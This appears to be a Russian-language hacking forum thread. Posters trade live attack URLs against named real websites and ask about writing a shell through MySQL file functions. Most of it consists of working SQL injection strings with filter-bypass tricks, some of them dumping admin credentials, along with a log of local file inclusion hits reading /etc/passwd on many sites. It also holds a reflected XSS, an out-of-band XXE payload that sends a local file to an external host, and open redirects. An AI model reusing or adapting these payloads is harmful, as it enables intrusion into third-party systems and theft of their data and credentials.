Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
php тут не причем, mysql поддерживает работу с файловой системой https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php https://dev.mysql.com/doc/refman/5.7/en/select-into.html
Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации
PHP: http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-
Code: http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42 http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05 https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26 http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59 http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43 http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57 https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58 http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38 http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42 http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42
PHP: http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+-http://foundation.sigmachi.org/station.php?id=wtg'+and+false+UnIon%0ASeLEct+1,user(),3,4,5,6+--+_http://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables # HTML: https://depositfiles.od.ua/tools/httpheaders.php
HTML: http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+
Провайдер Электронный щит. Локальная XSS. Code: http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
target: http://www.premium-network.ru type: Time-based, Error-based user: forumpt@localhost1 version: 5.5.371 Time-based: Code: www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+ Error-based: Code: http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+
OOB XXE Code: http://www.xmlforasp.net/SchemaValidator.aspx XML Payload: Code: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test SYSTEM "http://host/file.dtd"> <data>&test;</data> .dtd File: Code: <!ENTITY % file SYSTEM "file:///Windows/system32/drivers/etc/services"> <!ENTITY % all "<!ENTITY send SYSTEM '?%file;'>"> %all;
Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.
Code: 70('UNION ALL SELECT 1,2,version(),3-- a)--- Вывод в мета-теге: Code: <META NAME="description" CONTENT="Последние новости, события и объявления для абонентов сети кабельного телевидения и Интернет Premium Net. 3 5.5.37">
Code: <META NAME="keywords" CONTENT="Новости Пушкино Красноармейск Premium Net 4 5.5.37"> 70'+union+select+1,version(),3,4--+ Тут же банально все, зачем скобки?
Sql Injection Code: http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201 http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7,8,9+--+ Мда редкость Code: http://katalogshop.md/tmp/
HTML: http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x3c7363726970743e616c65727428646f63756d656e742e646f6d61696e293c2f7363726970743e%20--%20-
Что не получается? П.С только сейчас увидел ты это аттак PHP: http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('yml_catalog','shop','email','currencies','currency','categories','category','offers','offer','categoryId','picture','orderingTime','onstock','ordering'))+--+ Дальше сам HTML: https://rdot.org/forum/showthread.php?t=826
HTML: https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20= OpenRedirect HTML: https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-